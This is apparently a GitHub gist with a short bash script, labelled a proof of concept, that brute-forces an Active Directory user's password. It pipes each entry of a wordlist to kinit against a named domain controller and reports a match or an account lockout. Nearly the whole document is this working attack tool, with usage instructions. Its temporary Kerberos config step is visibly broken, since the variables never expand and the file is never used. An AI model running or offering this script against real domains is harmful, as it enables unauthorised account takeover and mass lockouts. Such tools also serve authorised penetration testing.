A quick tool to bruteforce an AD user's password by requesting TGTs from the Domain Controller with 'kinit'
#!/bin/bash | |
# Title: kinit_brute.sh | |
# Author: @ropnop | |
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller | |
# The script configures the realm and KDC for you based on the domain provided and the domain controller | |
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf | |
# Only tested with Heimdal kerberos (error messages might be different for MIT clients) | |
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful | |
USERNAME=$1 | |
DOMAINCONTROLLER=$2 | |
WORDLIST=$3 | |
if [[ $# -ne 3 ]]; then | |
echo "[!] Usage: ./kinit_brute.sh full_username domainController wordlist_file" | |
echo "[!] Example: ./kinit_brute.sh ropnop@contoso.com dc01.contoso.com passwords.txt" | |
exit 1 | |
fi | |
DOMAIN=$(echo $USERNAME | awk -F@ '{print toupper($2)}') | |
echo "[+] User: $USERNAME" | |
echo "[+] Kerberos Realm: $DOMAIN" | |
echo "[+] KDC: $DOMAINCONTROLLER" | |
echo "" | |
KRB5_CONF=$(mktemp) | |
cat > $KRB5_CONF <<'asdfasdf' | |
[libdefaults] | |
default_realm = $DOMAIN | |
[realms] | |
$DOMAIN = { | |
kdc = $DOMAINCONTROLLER | |
admin_server = $DOMAINCONTROLLER | |
} | |
asdfasdf | |
while read PASSWORD; do | |
RESULT=$( | |
echo $PASSWORD | kinit --password-file=STDIN $USERNAME 2>&1 | |
) | |
if [[ $RESULT == *"unable to reach"* ]]; then | |
echo "[!] Unable to find KDC for realm. Check domain and DC" | |
exit 1 | |
fi | |
if [[ $RESULT == *"Wrong realm"* ]]; then | |
echo "[!] Wrong realm. Make sure domain and DC are correct" | |
exit 1 | |
fi | |
if [[ $RESULT == *"Clients credentials have been revoked"* ]]; then | |
echo "[!] Account locked out!" | |
exit 1 | |
fi | |
if [[ $RESULT == *"Password incorrect"* ]]; then | |
: | |
elif [[ -z "$RESULT" ]]; then | |
echo "[+] Found password: $PASSWORD" | |
echo "" | |
exit 1 | |
else | |
echo "[+] Error: $RESULT" | |
fi | |
done <$WORDLIST |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment